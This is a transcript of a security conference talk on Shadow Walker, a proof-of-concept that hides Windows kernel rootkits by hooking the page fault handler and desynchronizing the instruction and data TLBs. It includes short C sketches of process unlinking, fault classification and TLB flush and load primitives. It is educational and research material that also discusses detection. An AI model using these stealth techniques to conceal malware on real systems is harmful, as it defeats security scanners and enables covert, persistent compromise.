Just a minute more as we get SoftICE running, things like that, and get our presentation set up. The presentation was originally developed for an hour and 30 minutes; however, this time slot is only 50 minutes, and we've already used about 7. So we may run a little late if we need to leave at 3, but I will blow through the first 20 slides in about 2 minutes, because we don't have time to cover them in depth, and Sherri has the interesting slides, so I will introduce her soon.

My name is Jamie Butler. I'm from rootkit.com. This is Sherri Sparks, and we developed a project called Shadow Walker, which is for hiding rootkits. You can find the material from this talk later on rootkit.com; I believe Sherri has posted the source code. It will also be in Phrack 63: if it hasn't appeared already, it probably will within the next week or two. If you don't understand much about rootkits, or you are new to the Windows world of rootkits, you can go to rootkit.com. We post material there for free; there's a lot of source code, and nothing there is for pay. Or you can buy the book Rootkits: Subverting the Windows Kernel, by Greg Hoglund and myself.

So we'll get started with Shadow Walker, with a quick blow-through of rootkits. They don't propagate themselves; they're not like a virus; they're there to provide stealth. The attacker gets on the box and tries to maintain a presence. They don't want to keep using their zero-day to come back to the machine all the time, so they install a rootkit. The rootkit is there to hide their presence and also to give them access at a later date. Rootkits could also be used lawfully, for things like a sneak-and-peek or a properly executed search warrant, and so forth.

There are two levels of protection within the Windows and Linux operating systems: basically two rings, ring zero and ring three. Ring three is userland processes; they are unprivileged. Ring zero is kernel land. Once you are in ring zero, your kernel rootkit can do whatever it wants. The operating system basically acts as an intermediary between upper-level user processes and the things they want to query the operating system for. Say I want to open a port: the operating system does that for me and hands the result back to the userland process. It also provides an interface between userland processes and the hardware below. So if you have a ring zero kernel rootkit, you are, just like the operating system, a man in the middle.

Some of the different OS components a rootkit may want to attack: the I/O manager, where you can install keyloggers; Sherri has a project on rootkit.com that's a keyboard sniffer. You can also attack the file system: you can write a file system filter driver and interpose on every single access to the hard drive. The object manager keeps bookkeeping structures for things like processes and threads, and you can attack the object manager in order to hide your processes and threads. There's also the configuration manager, which handles the registry.

So, first generation rootkits: what were they? These were simple Trojanized replacement programs on the hard drive. They might replace the Unix login program, ls, ps, and so on and so forth. Second generation rootkits started to be more sophisticated. These modify static tables within the kernel or within the upper levels of the operating system itself.
So you can replace the import address table of a PE file and alter the execution path that way. You can also alter the system call table within the kernel, and that will change which function actually gets executed within the kernel when the user makes a request.

Third generation rootkits, as we term them, use DKOM, direct kernel object manipulation. These actually don't hook anything, because hooks are a bit easier to detect. Third generation rootkits manipulate the data structures in memory. So there's no code modification; you don't alter the code at all, you just alter the data structures themselves. This is very hard to detect: data structures change very frequently, they're constantly changing, and that's why they're in the data section. We'll talk about how you can use this to hide processes and threads if you want to, or you can even use it to hide drivers, escalate process privileges, alter tokens, etc.

Real quick: about two years ago at one of the Black Hats (all the slides are online), I covered process hiding with DKOM, and it was also mentioned a little last year when I talked about VICE. What the kernel uses to keep track of all the processes is this list of active processes. Every EPROCESS block you see there represents an individual process in the system. One of those processes could be your little hacker program; it's doing things, and you don't want the system administrator to know you're there. At the bottom of the slide you see that there's a series of links. If you simply unlink the process that you want hidden, it will disappear when anyone tries to list processes. So when you run Task Manager, etc., it won't be there.

Now, for rootkit detection methods, there are basically four types. We don't have time to go into all of these, but quickly: behavioral, integrity-based, signature-based, and difference-based. Most AV products are, for example, signature-based. Integrity checkers such as Tripwire checksum the files on disk, so that if you replace one with a Trojan it will be found. Difference-based detection is kind of a new thing; Microsoft's doing it, F-Secure's doing it, Sysinternals is doing it. What it does is some kind of low-level scan within the kernel, walking structures directly, to get a list of things like files, processes, registry entries, etc. Then it does an upper-level API call. If there's a difference, it knows something's up. Behavioral detection: here you try to detect the effects of a rootkit. So you might look for alterations in the execution path, or signs that a different program is actually executing, things like the system calls or their ordering, etc. We don't have time to go into more of that. Integrity checking is exactly that: a checksum, a CRC. This could be done on disk or in memory; however, hardly anyone does it in memory. Signature-based, you scan memory or the disk for a particular set of bytes that represents the malcode.

So we have a really powerful way to hide a rootkit, or hide processes, etc., within the kernel: modify data structures. However, because we are in the kernel (we have a kernel-level driver), you can still find our driver with a simple scan, like a signature scan, for the presence of the malware. And that's not very good for us. So what we want to do is hide from that, so that even if you scan memory, you can't detect us without a lot of trouble. Again, if you're a rootkit, you want to make sure you can't be detected, or the rootkit has failed.
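(For readers following the unlinking discussion above, here is a minimal user-mode sketch of the DKOM idea. A simplified doubly linked list stands in for the kernel's ActiveProcessLinks chain; the structure layout and field names are illustrative stand-ins, not the real EPROCESS definition or the FU rootkit's actual code.)

```c
/* Minimal user-mode sketch of DKOM-style process hiding: unlink one
 * entry from a circular doubly linked list so that a list walk (what
 * Task Manager ultimately sees) skips it. */
#include <stdio.h>
#include <string.h>

typedef struct _LIST_ENTRY {
    struct _LIST_ENTRY *Flink;              /* forward link  */
    struct _LIST_ENTRY *Blink;              /* backward link */
} LIST_ENTRY;

typedef struct _FAKE_EPROCESS {             /* toy stand-in for EPROCESS */
    LIST_ENTRY ActiveProcessLinks;          /* must stay the first field */
    char       ImageFileName[16];
} FAKE_EPROCESS;

static void HideProcess(FAKE_EPROCESS *p)
{
    LIST_ENTRY *e = &p->ActiveProcessLinks;
    e->Blink->Flink = e->Flink;             /* point neighbors around us */
    e->Flink->Blink = e->Blink;
    e->Flink = e;                           /* orphan points at itself so */
    e->Blink = e;                           /* later list ops stay safe   */
}

static void ListProcesses(LIST_ENTRY *head)
{
    for (LIST_ENTRY *e = head->Flink; e != head; e = e->Flink)
        printf("  %s\n", ((FAKE_EPROCESS *)e)->ImageFileName);
}

int main(void)
{
    const char *names[3] = { "System", "explorer.exe", "hacker.exe" };
    FAKE_EPROCESS procs[3];
    LIST_ENTRY head = { &head, &head };     /* empty circular list */

    for (int i = 0; i < 3; i++) {           /* insert each at the tail */
        strcpy(procs[i].ImageFileName, names[i]);
        procs[i].ActiveProcessLinks.Flink = &head;
        procs[i].ActiveProcessLinks.Blink = head.Blink;
        head.Blink->Flink = &procs[i].ActiveProcessLinks;
        head.Blink = &procs[i].ActiveProcessLinks;
    }
    puts("Before:"); ListProcesses(&head);
    HideProcess(&procs[2]);                 /* unlink "hacker.exe"     */
    puts("After:");  ListProcesses(&head);  /* hidden entry is skipped */
    return 0;
}
```

The hidden process keeps running because the scheduler dispatches threads rather than walking this process list, which is exactly why the unlinked process disappears from listings without dying.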
This is a problem that viruses have had to face for a long time, and they use polymorphism to work around it. However, in the kernel it gets more problematic to build a good polymorphic engine. Also, no one's really doing it other than Holy Father with his Hacker Defender, and you have to pay him to get that; I think it's like 40 euros every time he does it. So really quickly, we're going to walk through how we hide instead, and I'll hand it over to Sherri.

Thank you, Jamie. I'm going to be discussing the technical implementation of Shadow Walker, which is our rootkit hiding technology. Like Jamie said, polymorphism has not really been seen a lot in rootkits so far, and it's not really an optimal approach for a rootkit. Viruses need to hide their code. Rootkits not only need to hide their code, they also need to hide their changes to operating system components. Polymorphism is not necessarily an optimal solution for that when you consider that there are memory-based equivalents of, say, Tripwire, or other types of integrity checkers. So basically, we wanted to figure out a way to hide in memory such that we can hook the memory of the system without actually changing the code at all. That gave rise to Shadow Walker, which we're positioning as a prototype of the fourth generation of rootkit technology.

Basically, the alternative to polymorphism is virtual memory subversion. What we're going to show you today is a proof-of-concept demonstration that a rootkit is capable of transparently controlling the view of memory seen by user applications, kernel drivers, and the operating system itself. Now, the cool thing about this technology is that there's minimal performance impact. Because we exploit some features of the hardware, our memory hook engine hiding a rootkit is virtually undetectable, with no noticeable slowdown or system performance hit. Obviously, that makes this type of technology attractive not only to a rootkit, but also potentially to a virus, worm, or spyware application.

Just a few implications of virtual memory subversion. For a long time, rootkit scanners relied upon the integrity of the operating system API. Like Jamie mentioned, ever since the second generation, rootkits have been hooking the API, and upper-level processes can no longer trust the results returned to them by the API, whether the user-level API or the kernel-level API, depending upon where the rootkit is hooking. Rootkit scanners have gotten a little smarter; they're starting to realize that they can't rely upon operating system APIs anymore. But even the rootkit scanners that don't rely upon operating system APIs still rely upon the integrity of the virtual memory system. So when a security scanner does a read of a certain memory address, it expects to see the data that's actually stored at that address. What we're proposing is to return data that is, in fact, not actually stored at that address.

There are two implications here. If we can control a scanner's memory reads, then we can fool signature scanners and potentially make known rootkit or virus code immune to an in-memory signature scan, because the scanner will access the range of memory where the rootkit code is stored and be returned data which is a clean copy, or which simply does not contain the rootkit code.
We can also fool integrity checkers. Jamie presented a talk on a tool called VICE, which basically attempts to detect hooks. Hooks typically work by replacing the beginning of the function prolog in an API with a jump instruction to a stub, which is the rootkit code. Under normal circumstances, you would not expect the first instruction in an API to be a jump instruction; the normal code would be things like stack setup code and allocation of local variables. Jamie uses characteristics like this to determine whether functions are hooked. The implication is that if we are subverting that particular function in memory, the scanner performs a read and receives a clean copy of the API function code, yet the code that actually executes is the hook code.

Since we're going to be talking about this subversion of virtual memory, we need to do a little bit of review. This is stuff that's normally covered in a college-level operating systems class, but most of us probably need a refresher on some of it. First we're going to talk about virtual address space layout, and then some of the concepts of virtual memory. We'll go over the ideas of paging and segmentation, page tables and PTEs, how virtual-to-physical address translation actually occurs, what the page fault handler does, and then some performance issues associated with paging and how those are mitigated by a hardware solution, the translation lookaside buffer. Finally, we'll talk about different memory access types and some little eccentricities of the x86 architecture.

What you have here are the two most common layouts for the Windows virtual address space. The first one breaks the virtual address space up into two main components. Like Jamie said, we have two modes of operation under Windows: a privileged mode, which is basically kernel land, and a non-privileged mode, which is basically userland. The memory address space is arranged similarly. The lower two gigabytes correspond to the userland address space; that's going to contain your application code and DLL code. The upper two gigabytes are where the operating system kernel lives. Up there you have the NT kernel, ntoskrnl; the HAL, the hardware abstraction layer; and drivers. You have key operating system structures, like the process objects Jamie was talking about and the process page tables, and then non-paged pool and cache memory. Alternatively, there's a second address space layout, used on some of the Server 2003 systems, which allows you to expand the user address space up to 3 gigabytes. But by far the most common layout is the one where it's split in half.

So what is the main idea behind virtual memory? The idea is that we want to separate the virtual and physical address spaces. By that I mean the size of the virtual address space is defined by the width of your address bus. If you have a 32-bit system, you have the ability to address 2^32, or approximately 4 gigabytes, of contiguous memory locations. So your virtual address space spans from 0 up to 4 gigabytes.
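(A rough sketch of the prolog-check heuristic attributed to VICE above, assuming 32-bit x86 code: flag an API whose first bytes form a jump where you would normally expect stack-frame setup. The opcode cases and the helper name are our own illustration, not VICE's actual implementation.)

```c
/* Heuristic hook check: does this function begin with a jump/detour
 * instead of a normal prolog such as "push ebp / mov ebp, esp"? */
#include <stdio.h>

static int LooksHooked(const unsigned char *fn)
{
    if (fn[0] == 0xE9) return 1;                        /* jmp rel32      */
    if (fn[0] == 0xFF && (fn[1] & 0x38) == 0x20)
        return 1;                                       /* jmp r/m32      */
    if (fn[0] == 0x68 && fn[5] == 0xC3) return 1;       /* push addr; ret */
    return 0;
}

int main(void)
{
    unsigned char clean[]  = { 0x55, 0x8B, 0xEC };      /* push ebp; mov ebp, esp */
    unsigned char hooked[] = { 0xE9, 0x00, 0x10, 0x00, 0x00 }; /* jmp +0x1000 */
    printf("clean: %d, hooked: %d\n", LooksHooked(clean), LooksHooked(hooked));
    return 0;
}
```

Shadow Walker defeats exactly this kind of check: the detector reads the clean bytes while the CPU fetches and executes the hooked ones.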
In contrast, most of us don't really have 4 gigabytes of RAM installed on our systems, unless we're really lucky. So we can say that our physical address space is constrained by the amount of RAM on our system, and the amount of RAM is most likely going to be less than the 4-gigabyte limit of the virtual address space.

Virtual memory concerns managing these virtual and physical address spaces by dividing them into fixed-size blocks. If those blocks are all the same size, we have a paging architecture. If the blocks may be variable sizes, it's a segmentation architecture. The x86 architecture is actually a combination of segmentation and paging; however, for the purposes of our talk, we're focusing on the paging architecture, because that's the level we're going to subvert. As far as how this maps: there's mapping information that maps a virtual block to a physical block, and the OS is what maintains this mapping information and determines which virtual blocks map to which physical blocks. Like I said before, the virtual address space may be larger than the physical address space. And because the OS manages the mapping, virtually contiguous memory blocks do not need to be physically contiguous.

This slide shows an illustration of those two points. As you can see, we have our virtual address space divided up into blocks; under a paging architecture, we call these blocks pages. The physical address space is smaller than the virtual address space. It's also divided into fixed-size blocks, termed frames. And as you can see, virtually contiguous blocks do not necessarily have to be physically contiguous.

So what actually holds the mapping information that the OS uses? It's contained in page tables, and page tables consist of entries called PTEs, or page table entries. Page table entries contain at least two pieces of useful information: status information and mapping information. The page frame number bits are the bits that describe where the page actually maps to in physical memory. Then there are a bunch of status bits, as you can see. A few of the most important ones: the V there is for valid; that determines whether the page is actually resident in memory or has been paged out to disk. You have the writable bit, which is concerned with protection, that is, whether the page is read-only or writable. You also have some bits, like cache disabled and the dirty bit, that the OS uses in its virtual memory management for page swapping and such. And the last bit of interest is the global bit. The global bit is interesting because it determines whether or not that particular mapping information will be flushed from the hardware cache on a context switch. This becomes important later on.

So here's an illustration of the big picture, just to summarize all these ideas. We have our virtual address space layout divided into user space and kernel space. We have our pages, which are the divisions of the virtual address space. We have the process page tables, located in kernel memory. The process page tables contain PTEs, which contain status information and mapping information, which says where those pages are located out in physical memory.
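(The PTE just described can be pictured as a C bitfield over a 32-bit x86 entry. Bitfield ordering is compiler-dependent, so treat this as documentation of the format rather than portable systems code; the struct name is made up.)

```c
/* Sketch of a 32-bit x86 (non-PAE) page table entry, low bit first. */
#include <stdint.h>

typedef struct {
    uint32_t Valid           : 1;  /* P: page is resident in physical memory   */
    uint32_t Writable        : 1;  /* R/W: 0 means read-only                   */
    uint32_t Owner           : 1;  /* U/S: user vs. supervisor access          */
    uint32_t WriteThrough    : 1;
    uint32_t CacheDisabled   : 1;
    uint32_t Accessed        : 1;
    uint32_t Dirty           : 1;  /* set by hardware when the page is written */
    uint32_t LargePage       : 1;  /* PS/PAT depending on table level          */
    uint32_t Global          : 1;  /* G: survives the TLB flush on CR3 reload  */
    uint32_t Available       : 3;  /* free for the OS to use                   */
    uint32_t PageFrameNumber : 20; /* physical frame this page maps to         */
} HW_PTE;

/* Physical address = (PageFrameNumber << 12) + byte offset within the page. */
```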
So how do you go from an address to figuring out where that particular page is in the page table? Virtual addresses encode the information necessary to index into the page tables. Page tables may be single-level or multi-level; the x86 maintains a two-level paging architecture. We divide the virtual address into two pieces: the virtual page number, which contains the page table indexing information, and the byte index, which is an offset within the frame in physical memory.

Since we have a two-level architecture, that means not only do we have page tables, we also have a page directory. The page directory is a table of pointers to page tables, and the page tables, of course, contain pointers to physical frames. A two-level scheme is used to save memory, since only the page directory has to stay resident. So in this case, our virtual page number is itself divided into two pieces: we have to figure out the index into the page directory, so we can locate the correct page table, and then the index into the page table, so we can locate the correct page frame. Under x86, the upper 10 bits of the virtual address provide your index into the page directory, while the middle 10 bits provide your index into the page table.

This slide gets a little complicated, but I'm going to give it a go here and try to explain it. There are a number of steps involved in virtual-to-physical address translation, and this is performed by the hardware. The first step is to locate the base address of the page directory in memory. The page directory base is held in the process block, and its physical address is also loaded into CR3, a control register on the processor. The second step is to locate the entry in the page directory that contains the pointer to the page table we need. So we extract the upper 10 bits from the virtual address and use them as an index from the page directory base to obtain the entry in the page directory. The contents of that page directory entry is basically a pointer to a page table, the base physical address of the page table in memory. So at this point we have the base address of the page table, and now we're trying to get to the PTE, the entry in the page table. To get there we do the same type of thing: we take the middle 10 bits of the virtual address, use them as an index from the base address of the page table, and we now have the actual page table entry, which contains the pointer to the page frame in physical memory. So at this point we have a pointer to the page frame, and we're looking for some byte within that frame. It's finally here that the byte index comes in: we add it to the base address of the physical frame to resolve the full physical address.

Like we said earlier, physical memory may be smaller than the amount of virtually addressable memory you have. Therefore the OS may need to move some pages from main memory out to disk to satisfy current memory demands.
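(A small runnable illustration of the index extraction used in that walk: the top 10 bits select the page directory entry, the middle 10 bits select the page table entry, and the low 12 bits are the byte offset within the 4K frame. The sample address is arbitrary.)

```c
/* Decompose a 32-bit virtual address the way the x86 hardware walk does. */
#include <stdio.h>
#include <stdint.h>

int main(void)
{
    uint32_t va = 0x8053C2A7;               /* arbitrary kernel-range address */

    uint32_t pdi    = (va >> 22) & 0x3FF;   /* page directory index (10 bits) */
    uint32_t pti    = (va >> 12) & 0x3FF;   /* page table index     (10 bits) */
    uint32_t offset =  va        & 0xFFF;   /* byte index in frame  (12 bits) */

    printf("VA 0x%08X -> PDE %u, PTE %u, offset 0x%03X\n", va, pdi, pti, offset);

    /* The hardware walk: PageDirectory[pdi] yields the page table base,
     * PageTable[pti] yields the physical frame, then add the offset. */
    return 0;
}
```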
When the OS does this, it marks the PTE for the page in question as invalid, writes the page out to disk, and the next time that page is accessed, it generates a page fault. A page fault is basically just an interrupt that causes a vector to an interrupt service routine, which in this case is the page fault handler. There are actually several conditions under which a page fault can occur. The most common is the case where the page table entry is marked invalid because the page has been swapped out to disk and needs to be brought back in. There's a little caveat to that: not only does the PTE need to be marked invalid, the entry also cannot be present in the TLB, the hardware cache of virtual-to-physical mappings. This becomes very important later on. The second situation is a memory protection violation: basically, user-mode code attempting to access kernel memory, or perhaps an attempt to write to memory that's marked read-only.

For all of you that I lost on that previous slide of virtual-to-physical translation, I have a little clearer one that shows the whole page fault path. Sorry about that; space bar from now on. First, you have a memory access. The first thing we do is look it up in the page directory to resolve the page table. In this case, it's present, so we can move on out to the page table. In the page table, we try to look up where the physical frame is. In this case, that particular PTE has been marked invalid, and a page fault is generated. This causes the page fault handler to be invoked. The page fault handler is now responsible for issuing the disk I/O to go out to the page file and load that frame back into main memory. Once it's loaded back into memory, it marks the PTE as valid.

Some people would say that paging is not such a good idea, because there's a steep performance hit associated with it. Basically, we take one memory reference and turn it into three memory accesses; we're cutting our performance by a factor of three. First we have to access the page directory: that's one memory reference. Then we have to access the page table: there's another memory reference. Now we have to actually go out and get the byte at the correct physical address: there's our third memory reference. So even in the best case, every single memory access requires three memory accesses to resolve the virtual-to-physical translation. In the worst case, not only do we need three memory accesses, we might potentially need two disk I/Os, because, since we have a two-level paging scheme, our page tables may be non-present and our actual page frames may be non-present as well. So you may have up to two additional disk I/Os.

As you can see, paging introduces a performance hit. Hardware designers found this unacceptable, and they developed a solution to help mitigate the problem: the translation lookaside buffer. The TLB is basically a high-speed hardware cache, generally implemented in associative memory, that holds the most frequently used virtual-to-physical mappings. The TLB caches the information held in the PTEs of pages that are used frequently.
The TLB is a lot smaller than main memory, which means it's possible for an entry in the TLB to be evicted if another page that maps to that TLB entry needs to be loaded in. The TLB is first on the memory access path; it sits in front of the page table path. Therefore, on a memory access, the TLB is searched before we ever go out to the page tables. Since it is high-speed associative memory, a reference found in the TLB can be resolved much, much faster than it could be by doing even a single memory reference to main memory. If the reference is found in the TLB, we say we had a hit; if not, we had a miss. The x86 actually uses a split TLB architecture, and by that I mean there are two TLBs. There's one that holds translations for code, the ITLB, and another that holds translations for data, the DTLB. I should note that modern TLBs have extremely high hit rates, which means most translations are resolved via the TLB cache, as opposed to having to go out to the page tables, and that significantly increases performance.

This is just a simple example of a TLB search. The TLB is a cache, and it consists of two parts. You have a tag, which in this case is the virtual page number, and then you have the corresponding frame that maps to that virtual page number in the data section of the cache line. When a memory reference occurs, the TLB tags are searched in parallel to find a match on the virtual page number. If there's a match, the corresponding physical frame mapping is returned. In this case, we had a TLB hit on virtual page 17, and its corresponding frame is 84.

Here I have an illustration of the memory access path that includes a TLB. We're sticking with the x86 architecture, which has a split TLB, meaning that on a memory access, code accesses are checked in the ITLB. In this case we have a hit in the ITLB: we now have the corresponding frame, which is 132, and we can go directly out to physical memory. As you can see, since we had a TLB hit, we were able to completely bypass the page tables. It's also possible that we don't get a TLB hit. We could get a miss, and what's even worse than a miss, once we go out to the page tables we might actually get a page fault, which kills performance even further. In this case, our memory access is a code access. It goes to the ITLB, searches it, and it's not there, so we have a miss. Now we go out to the page tables, and we find that something we need is not present, so we have a page fault. The OS page fault handler has to be invoked; it goes out to disk, brings the frame into memory, and finally marks the PTE as present before the access can be resolved.

So basically, we think of three memory access types; everyone's familiar with this: read, write, and execute. Unfortunately, a little caveat of the x86 architecture is that we effectively have only two memory access types: read/execute and read/write/execute. By that I mean the execute access is implied on all memory. This poses a slight problem: in some cases, we might like to differentiate between execute access and read/write access.
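(A toy model of the split-TLB search, reusing the page and frame numbers from the slides. Real TLBs are set-associative hardware searched in parallel; the sizes and layout here are arbitrary stand-ins.)

```c
/* Tiny fully associative "TLB" keyed on virtual page number. */
#include <stdio.h>
#include <stdint.h>

#define TLB_ENTRIES 4

typedef struct { uint32_t vpn; uint32_t pfn; int valid; } TlbEntry;
typedef struct { TlbEntry e[TLB_ENTRIES]; } Tlb;

static int TlbLookup(Tlb *t, uint32_t vpn, uint32_t *pfn)
{
    for (int i = 0; i < TLB_ENTRIES; i++)
        if (t->e[i].valid && t->e[i].vpn == vpn) { *pfn = t->e[i].pfn; return 1; }
    return 0;   /* miss: fall back to the page table walk (maybe a fault) */
}

int main(void)
{
    Tlb itlb = { { { 17, 132, 1 } } };      /* code translations */
    Tlb dtlb = { { { 17,  84, 1 } } };      /* data translations */
    uint32_t pfn;

    if (TlbLookup(&itlb, 17, &pfn)) printf("ITLB hit: page 17 -> frame %u\n", pfn);
    if (TlbLookup(&dtlb, 17, &pfn)) printf("DTLB hit: page 17 -> frame %u\n", pfn);

    /* Note the two caches can hold different frames for the same page:
     * the property Shadow Walker deliberately exploits. */
    return 0;
}
```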
One common place where this matters is the implementation of non-executable memory, used as a buffer overflow protection scheme. You have your stack space, which is typically readable and writable; you store data on the stack, but normally the stack does not contain executing code unless a buffer overflow attack is in progress. So if we were able to distinguish an execute access from a read/write access on the stack, then when we detect an execute, heuristically there's a good probability that a buffer overflow attack is in progress. The catch is, like we said, x86 doesn't let us distinguish between read/write and execute, so until recently we have not had hardware support for this. We do now have some hardware support, but previously there was a project called PaX. PaX implemented read/write, no-execute (that is, non-executable memory) semantics using strictly software support, before there was any hardware support for non-executable memory. Windows XP Service Pack 2 and Server 2003 Service Pack 1 now also implement software support, in the form of what Microsoft calls Data Execution Prevention, or DEP. As a side note, hardware support for non-executable memory has been added on the 64-bit processors, as well as the Pentium 4.

Well, in the case of a rootkit, it's also advantageous to be able to distinguish between execute and read/write access to a range of memory. Basically, we're going to take an offensive spin on the PaX technology. The technique has been around for a while, but so far no one has really shown how you could invert it for malicious purposes. We want to hide code, so we want to differentiate between read/write and execute. The idea is: if there is a read access on the code section of our rootkit driver, for example, that's a very strong heuristic that a scanner is trying to locate us. What we want in that case is for our rootkit code to run, but if a scanner tries to read it, we want to return a view of that memory that does not contain the rootkit code, or that contains something clean, in the case of a modification to the operating system. So what we're proposing here is an implementation that is the inverse of PaX: an implementation of execute-allowed but diverted read/write memory semantics. We're going to use the technique that PaX discovered to implement non-executable memory, but in this case, we're going to use it to hide a rootkit. Like I said, the technique is not totally new, but the application is somewhat new.

There are three implementation issues here. First, we need a way to filter execute accesses from read/write accesses; that's step one. Second, we need a way to fake the read/write accesses once we detect them; obviously, we don't want the scanner to receive the real data when it reads our rootkit memory. Lastly, we need to ensure that performance is not adversely affected. Obviously, this would not be a viable solution if, when we install our rootkit, the system administrator notices that his machine is suddenly running really, really slowly.

To solve the first problem: we said earlier that if we mark the PTE as invalid, the next memory access to that page generates a page fault.
So that means we can trap memory accesses by marking their page table entries as invalid and hooking the page fault handler, replacing the operating system's page fault handler. Inside the page fault handler, we have access to some interesting information: we have the saved instruction pointer, and we also have the virtual address where the fault occurred. Therefore, if our instruction pointer equals the address where the fault occurred, we can say it was an execute access; otherwise, it's a read/write access.

There's one important thing to note here: our memory hook for the rootkit has to work safely with the operating system's memory management, because the operating system is resolving page faults all the time. In practical terms, that means that if we're going to mark pages not-present to capture memory accesses, we must also be able to distinguish whether a given fault is the result of someone trying to access a hidden page, or the result of normal operating system paging activity. To satisfy that, we impose two constraints. The first constraint is that hidden pages are required to be in non-paged memory, so there's no possibility that the OS could page that memory out to disk. The second constraint is that if you're using pageable memory, you use an operating system API to lock it down.

Once you're able to distinguish execute accesses from read/write accesses, the issue becomes: how are we actually going to fake the read/write accesses? This is the technique shown in PaX, which used it to implement the inverse of what we're going to talk about: we're going to desynchronize the hardware caches, the TLBs. Like I said, the x86 has two of them: one for code, which is searched on execute, and one for data, which is searched on read/write. Under normal circumstances, the ITLB will contain the virtual page number with its corresponding physical frame, and the DTLB will contain the same thing. So in this case, for virtual page number 12, the ITLB says it maps to frame two, and the DTLB also says frame two. Normally, read, write, and execute all map to the same physical frame.

But what if we could desynchronize them? What if we could have the ITLB map to a different physical frame than the DTLB? The idea here is that the ITLB contains a pointer to the frame that holds the rootkit code, and the DTLB contains a pointer to a frame that holds either a clean copy of something or some random garbage, in any case not the rootkit code. And since all of these translations are performed at the hardware level, this is transparent to application programs, to kernel drivers, and even to the operating system.

So once we've decided we're going to desynchronize the TLBs, the question is: how do you actually do it? TLBs are almost entirely under hardware control; however, there is a little bit of support for software control, which in this case happens to be enough to implement this. First of all, we have the capability to flush the TLB. We can flush the entire TLB by reloading register CR3, which normally occurs on a context switch.
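(The execute-versus-read/write test reduces to a single comparison. A hedged sketch: in a real hooked handler the faulting address comes from CR2 and the saved instruction pointer from the trap frame; the names below are our own illustration, not a kernel API.)

```c
/* Classify a page fault on a hidden page, as described above. */
#include <stdint.h>

typedef enum { ACCESS_EXECUTE, ACCESS_READWRITE } AccessType;

static AccessType ClassifyFault(uint32_t savedEip, uint32_t faultVa)
{
    /* If the instruction pointer itself points at the faulting address,
     * the CPU was fetching code from the page: an execute access.
     * Otherwise some instruction elsewhere touched the page as data. */
    return (savedEip == faultVa) ? ACCESS_EXECUTE : ACCESS_READWRITE;
}

/* Because hidden pages must be non-paged (or explicitly locked down),
 * any fault on them is ours rather than normal OS paging.  A hash table
 * over hidden page addresses gives the quick "is this ours?" test; here
 * is a one-entry stand-in for that lookup. */
#define PAGE_MASK 0xFFFFF000u
static uint32_t g_hiddenPage;               /* page-aligned hidden address */

static int IsHiddenPage(uint32_t faultVa)
{
    return (faultVa & PAGE_MASK) == g_hiddenPage;
}
```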
On a context switch, CR3 is typically reloaded, which flushes the entire TLB except for global entries, which remain in the TLB. That's mainly a performance enhancement for operating system components that remain resident at all times. We also have a way of flushing not just the entire TLB, but an individual entry in the TLB: the invalidate page instruction, INVLPG.

Now that we've established that we can flush the TLB, how about loading it? It is in fact possible to load the two TLBs separately: executing a data access loads the DTLB but not the ITLB, and conversely, executing a call loads the ITLB but not the DTLB. Therefore, it is possible to discreetly load the two TLBs separately and desynchronize them.

Our proof-of-concept implementation consists of two main components. We have the memory hook engine, which has a hook installation component that sets up the hook, and a custom page fault handler, which is responsible for filtering execute and read/write accesses and correctly loading the right TLB by hand. Our second component is a modified FU rootkit; we modified Jamie's rootkit to work in collusion with Shadow Walker.

On memory hook installation, several steps have to be performed. First of all, since we're going to mark pages not-present, we need to install a new page fault handler. Once we've done that, on a page fault, we need to be able to determine relatively quickly whether that fault is due to one of our hidden pages being accessed, or due to the operating system performing normal paging activity. To do that, we insert the page into a simple hash table, so we can perform a quick lookup. Next, we mark the page not-present. The last step is really the most important, because we said the TLB is first on the memory access path, which means a page fault is generated, one, when the PTE is marked not-present, and, like I said earlier, two, when that entry is also not present in the TLB. Therefore we perform an explicit flush of the page we're hiding. This means that the next memory access to it will generate a page fault. If you could please hold your questions until the end; we'll have time for questions.

The custom page fault handler's main responsibility is to filter read/write and execute accesses for hooked pages. If it determines that the page is not a hooked page, meaning it's just a normal operating system page fault, it passes it down to the OS handler. If it is a page fault due to a hidden page, it will either manually load the ITLB or manually load the DTLB, depending upon the type of access.

Most memory references will be resolved via the TLB path. Intuitively, you might think we would be generating a lot of page faults and taking a big hit in performance. Not the case, because we're using the hardware caching mechanism; we're simply desynchronizing it. So we will still have page faults, but not as many as you might think, since the TLB path will handle most of the memory references. Page faults on the hooked pages will, of course, occur on the first execute or data access to the page; remember, we flushed the TLB when we instantiated the hook. They will also occur on a TLB cache line eviction, since it's possible that the mapping for a hooked page gets evicted from the TLB.
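(Sketched below as GCC-style inline assembly are the flush and load primitives that the hook installation and the handler depend on. These must run at ring 0; the helper names are ours, and only the CR3 reload, INVLPG, and the load-by-access behavior come from the talk.)

```c
/* TLB control primitives on 32-bit x86 (ring 0 only). */
#include <stdint.h>

/* Flush the entire TLB, except global entries, by reloading CR3. */
static inline void FlushAllTlb(void)
{
    uint32_t cr3;
    __asm__ __volatile__("mov %%cr3, %0\n\t"
                         "mov %0, %%cr3" : "=r"(cr3) : : "memory");
}

/* Flush the single TLB entry covering one virtual address (INVLPG). */
static inline void FlushOneTlbEntry(void *va)
{
    __asm__ __volatile__("invlpg (%0)" : : "r"(va) : "memory");
}

/* A data touch fills only the DTLB... */
static inline void LoadDtlb(volatile uint8_t *page)
{
    (void)*page;                    /* read access caches VPN->frame in DTLB */
}

/* ...while transferring control into the page fills only the ITLB.
 * Shadow Walker calls a single patched RET byte inside the hidden page. */
typedef void (*PageThunk)(void);
static inline void LoadItlb(void *retByteInPage)
{
    ((PageThunk)retByteInPage)();   /* instruction fetch caches entry in ITLB */
}
```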
In that case, the next memory access will generate a page fault, the page fault handler will reload the correct mapping into the TLB, and the memory access will go through. Likewise, the last case is an explicit TLB flush on a context switch, if the global bit has not been set.

So here we have some really rudimentary page fault handler pseudocode for what's going on. We are only hiding kernel pages right now, so we disregard userland accesses. In the page fault handler, we want to be as efficient as possible; we don't want to tie things up if we're not interested in handling a fault. So the first thing we do is check whether the processor was in user mode. If it was, we pass the fault down; we're not dealing with user mode. If the faulting address is a user page, we also pass it down, because we don't hook user pages. In contrast, if the fault is from a hidden page, we check whether it's a read/write or an execute. If it's an execute, we jump over to the code that loads the ITLB; if it's a data access, we jump over to the load-DTLB code.

